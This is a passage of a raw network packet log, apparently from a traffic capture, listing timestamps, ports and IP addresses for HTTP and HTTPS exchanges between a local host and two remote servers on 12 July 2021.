Jul 12, 2021 10:28:46.527319908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527345896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527374029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527391911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527411938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527437925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527456999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527472019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527498007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527520895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527542114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527553082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527575016 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527587891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527611017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527636051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527650118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527671099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527693987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527705908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527724981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527743101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527756929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527777910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527801037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527806044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527896881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528107882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528248072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528326988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528358936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528383970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528404951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528424978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528434038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528455973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528476954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528491020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528512001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528534889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528544903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528568983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528589964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528795958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528820038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528845072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528851986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528872967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528892994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528907061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528928041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528949022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528954983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.528974056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.528992891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529000998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529020071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529040098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529057026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529071093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529093027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529107094 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529124975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529139042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529159069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529186010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529211044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529217958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529242039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529259920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529275894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529321909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529717922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529750109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529769897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529792070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529804945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529830933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529838085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529859066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529882908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529902935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.529917955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.529963970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530006886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530137062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530163050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530189991 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530268908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530320883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530355930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530426025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530452967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530473948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530493975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530519962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530535936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530575991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530600071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530622005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530632019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530654907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530683041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530692101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530715942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530761003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530775070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530824900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.530848026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530865908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.530917883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.936374903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.961329937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.961461067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:51.058804035 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:51.288291931 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:51.288429976 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:51.353387117 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:51.583107948 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:51.586555004 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:51.586643934 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:51.817012072 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:51.817081928 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:53.838382006 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.067475080 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.072449923 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.072694063 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.301829100 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.303299904 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.309006929 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.538269043 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.538983107 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.539035082 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.539058924 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.539079905 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.539100885 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.539103985 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.539144993 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.539172888 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.539218903 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.545241117 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.555495024 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.559330940 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.563479900 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.563568115 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.571440935 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.571481943 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.571552038 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.587636948 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.589289904 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.595659018 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.595721006 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.595861912 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.611515999 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.613332987 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.767961979 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.768006086 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.768522024 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.776345968 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.776388884 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.776572943 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.792408943 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.792454004 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.792543888 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.810631990 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.810672045 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.810854912 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.813262939 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.824609041 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.824651957 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.824826956 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.840653896 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.840693951 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.840931892 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.857091904 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.857127905 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.857208967 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.857264996 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.873002052 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.873044968 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.873157978 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.888098955 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.888201952 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.888243914 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.888269901 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.903393030 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.903443098 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.903485060 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.903513908 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.918612003 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.918759108 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.918852091 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.918916941 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.933695078 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.933727980 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.933777094 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.933805943 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.948640108 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.948699951 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.948724031 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.948784113 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.966373920 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.966408014 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.966519117 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.997572899 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.997605085 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:54.997653961 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:54.997699022 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.002912045 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.002948046 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.002981901 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.003006935 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.013740063 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.013808966 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.017343998 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.017409086 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.024414062 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.024446011 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.024471998 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.024496078 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.035259962 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.035295010 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.035336018 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.035362005 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.046195030 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.046235085 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.046252012 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.046307087 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.056778908 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.056812048 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.056842089 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.056865931 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.067519903 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.067557096 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.067591906 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.067619085 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.078109026 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.078140974 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.078166962 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.078191042 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.088705063 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.088742018 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.088767052 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.088789940 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.099426031 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.099461079 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.099517107 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.110018969 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.110093117 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.110141039 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.110188007 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.120707989 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.120742083 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.120768070 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.120791912 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.131546021 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.131581068 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.131608009 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.131632090 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.143877029 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.143912077 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.143932104 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.143959045 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.153002024 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.153040886 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.153079033 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.153105021 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.163523912 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.163556099 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.163603067 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.173924923 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.173960924 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.173995018 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.174021006 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.183617115 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.183650017 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.183676004 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.183698893 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.193130016 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.193167925 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.193192005 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.193213940 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.202358007 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.202413082 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.202455044 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.202492952 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.211623907 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.211658955 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.211679935 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.211703062 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.220632076 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.220669985 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.220693111 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.220721006 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.229403973 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.229448080 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.229470968 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.229496002 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.238199949 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.238239050 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.238300085 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.247039080 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.247081041 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.247153997 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.252738953 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.252780914 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.252811909 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.252888918 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.258274078 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.258327961 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.258430958 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.258483887 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.263927937 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.263964891 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.263982058 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.264005899 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.269274950 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.269311905 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.269352913 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.269376993 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.274801016 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.274846077 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.274885893 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.274912119 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.280148983 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.280188084 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.280213118 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.280244112 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.285485983 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.285547018 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.285574913 CEST	443	49724	45.154.13.94	192.168.2.3
Jul 12, 2021 10:28:55.285614967 CEST	49724	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:28:55.290689945 CEST	443	49724	45.154.13.94	192.168.2.3
